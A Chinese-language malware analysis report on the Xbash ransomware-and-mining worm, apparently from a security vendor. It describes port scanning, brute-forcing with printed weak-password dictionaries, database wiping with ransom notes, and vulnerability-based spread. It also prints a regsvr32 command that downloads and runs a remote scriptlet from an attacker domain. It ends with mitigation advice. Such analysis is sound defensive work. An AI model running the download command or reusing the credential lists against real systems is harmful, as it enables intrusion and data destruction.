Xbash勒索挖礦樣本分析
一、事件背景
Unit42安全研究團隊發現了一款針對Linux和Microsoft Windows伺服器的新型惡意樣本,Xbash擁有勒索軟體和核心功能,同時它還具備自我傳播的功能。
Xbash主要通過攻擊弱密碼和未修補的漏洞進行傳播。
二、樣本分析
樣本是用Python語言進行開發編寫,然後轉化為PE檔案,這樣主要是為了做免殺處理,同時也具備跨平臺的特性。
獲取到相應的樣本之後,解密提取出程式中的核心PY指令碼,如下所示:
1.通過http://ejectrift.censys.xyz/cidir獲取公網IP地址段,然後進行埠掃描,如下所示:
掃描的埠號列表如下:
873,3306,5432,6379,27017,8161,8088,8000,8080,8888,5900,5901,5902,9900,9901,9902
2.對相應的WEB服務埠進行掃描,如下所示:
相應的埠服務,列表如下:
· HTTP:8088,8000,8080,80
· VNC:5900,5901,5902,9900,9901,9902
· RDP:3389
· Oracle:1521
· Rsync:873
· Mssql:1433
· Mysql:306
· Postgresql:5432
· Redis:6379,7379
· Elasticsearch:9200
· Memcached:11211
·Mongodb:27017
3.然後對掃描到的WEB服務,進行暴力破解,如下所示:
4.使用內建的弱使用者名稱和密碼字典,暴力破解登入相應的服務,如下所示:
相應的WEB服務列表如下:
Rsync,VNC,phpmyadmin,SQL/">MySQL,postgresql,mongodb,redis
使用到的相應的弱使用者名稱列表如下:
USER_DIC = {'mysql': ['root'], 'postgresql': ['postgres', 'admin'], 'mongodb': ['admin'], 'redis': ['null']}
弱密碼列表如下:
PASSWORD_DIC = ['test', 'neagrle', '123456', 'admin', 'root', 'password', '123123', '123', '1', '{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016', '{user}2015', '{user}!', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'tomcat', 'apache', 'system'] MY_PASSWORD = ['summer', '121212', 'jason', 'admin123', 'goodluck123', 'peaches', 'asdfghjkl', 'wang123456', 'falcon', 'www123', '1qazxsw2', '112211', 'fuckyou', 'test', 'silver', '123456789', '234567', '1122334455', 'xxxxxx', '123321', '7788521', '123456qaz', 'hunter', 'qwe123', '123', 'asdf123', 'password', '1q2w3e4r', 'nihao123', 'aaaa1111', '123123', '147258369', 'a123', '123qwe', '1234abcd', 'spider', 'qqaazz', 'qwertyuiop', '1234qwer', '123abc', 'qwer1234', 'mustang', '123456', '123456a', 'ww123456', '1234', '123456.com', 'football', 'jessica', 'power', 'q1w2e3r4t5', 'aaa123', 'passw0rd', '741852', '666666', '123465', 'justin', '!@#$%^&*()', '12345', '222222', 'qazwsx123', '999999', 'abc123', 'tomcat', 'dongdong', '654321', '111111a', 'q1w2e3', 'dragon', '1234560', '1234567', 'asd123456', 'secret', 'abc123456', 'master', 'qq123456', '1q2w3e', 'playboy', 'P@ssw0rd', '123654', '88888888', '12345678', 'orange', 'rabbit', 'jonathan', '000000', 'qwer', 'admin', 'asdfasdf', '1234567890', '709394', '12qwaszx', 'abcd1234', 'pass', 'fuck', 'abc12345', 'qweasdzxc', 'abcdef', 'superman', 'rainbow', '11111111111', '1', '321', '888888', '1qaz2wsx', 'test', '112233', 'qazwsx', 'welcome', '4815162342', 'tiger', 'wangyang', 'q1w2e3r4', '111111', 'a123456', 'hello', '123456654321'] PASSWORD_DIC.extend(MY_PASSWORD)
5.如果成功登入到MySQL,MongoDB,PostgreSQL等WEB服務,會刪除伺服器中的資料庫,然後建立一個勒索資訊的新資料庫,並寫入一條勒索資訊到新的資料庫表中,如下所示:
針對MongoDB資料庫的勒索:
針對PostgreSQL資料庫的勒索:
針對MySQL資料庫的勒索,如下所示:
相應的勒索資訊錢包地址和郵件地址如下:
'Bitcoin_Address': '1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr', 'Email': '[email protected]'
6.針對內網進行掃描,獲取本地網路資訊,然後生成同一個子網內的IP地址列表,進行掃描,如下所示:
內網掃描的相應埠號如下所示:
埠號:6379,8161,8088,8000,8080,8888
7.利用幾個相關漏洞進行傳播,如下所示:
Hadoop YARN ResourceManager未經身份驗證的命令執行:
ActiveMQ任意檔案寫入漏洞:
Redis任意檔案寫入和遠端命令執行:
寫入執行,相應的crontab,如下所示:
通過相應的漏洞進行感染其它系統的時候會同時感染相應的Window伺服器,利用Windows的系統特性進行感染,相應的Windows命令如下:
regsvr32 /s /n /u /i:http://d3goboxon32grk2l.tk/reg9.sct scrobj.dll等
8.寫入相應的crontab自啟動項,設定定時任務,從網上下載相應的挖礦指令碼,如下所示:
9.下載的相應的挖礦指令碼如下:
先幹掉其它的Linux系統下的各種挖礦家族,包括之前的(DDG挖礦家族),然後再下載自己的挖礦程式,如下所示:
挖礦的埠號:3333,5555,7777,14444
10.Windows上的下載執行挖礦流程,設定自啟動指令碼reg9_sct,其實是一個Shell/">PowerShell指令碼,如下所示:
解密出相應指令碼之後,如下所示:
再次進行解密,如下所示:
tmp.ps1指令碼,內容如下:
解密出相應的PowerShell指令碼,如下:
會下載相應的tmp.jpg惡意程式,同時設定相應的Windows計劃任務,如下所示:
11.tmp.jpg是一個64位的程式,使用VMP加殼,如下所示:
經過分析是一個挖礦的程式,如下所示:
相應的挖礦操作,如下所示:
挖礦對應的字串,如下所示:
三、解決方案
1、更改賬戶密碼,設定強密碼,避免使用統一的密碼,因為統一的密碼會導致一臺被攻破,多臺遭殃。
2、如果業務上能不使用RDP的,則建議關閉RDP。當出現此類事件時,推薦使用深信服防火牆,或者終端檢測響應平臺(EDR)的微隔離功能對3389等埠進行封堵,防止擴散!
3、深信服防火牆、終端檢測響應平臺(EDR)均有防爆破功能,防火牆開啟此功能並啟用相應的規則,EDR開啟防爆破功能可進行防禦。
4、建議對全網進行一次安全檢查和防毒掃描,加強防護工作。
5、普通使用者,可下載如下工具,進行查殺。